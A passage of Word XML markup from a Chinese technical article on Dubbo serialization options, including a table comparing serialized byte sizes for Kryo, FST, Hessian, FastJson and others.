          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hessian2Serialization：使用Hessian2的IO机制实现的序列化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC3DA1" w:rsidRPr="00722ED5" w:rsidRDefault="00AC3DA1" w:rsidP="00722ED5">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:ind w:left="375"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00786256">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DubboSerialization：Dubbo自定义的序列化实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="005729A4" w:rsidP="00624B3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>序</w:t>
      </w:r>
      <w:r w:rsidR="00E90FC0" w:rsidRPr="00E90FC0">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>列化生成字节码的大小是一个比较有确定性的指标，它决定了远程调用的网络传输时间和带宽占用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00624B3D">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E90FC0">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="3F3F3F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>针对复杂对象的结果如下（数值越小越好）：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellSpacing w:w="15" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1455"/>
        <w:gridCol w:w="780"/>
        <w:gridCol w:w="795"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidTr="00E90FC0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>序列化实现</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>请求字节数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>响应字节数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidTr="0058529B">
        <w:trPr>
          <w:trHeight w:val="552"/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Kryo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>272</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidTr="00E90FC0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>FST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>288</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>96</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidTr="00E90FC0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Dubbo Serialization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>430</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>186</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidTr="00E90FC0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Hessian</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>546</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>329</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidTr="00E90FC0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>FastJson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>461</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>218</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidTr="00E90FC0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00E90FC0" w:rsidRPr="00E90FC0" w:rsidRDefault="00E90FC0" w:rsidP="00E90FC0">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="376" w:lineRule="atLeast"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E90FC0">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
                <w:color w:val="3F3F3F"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>Json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
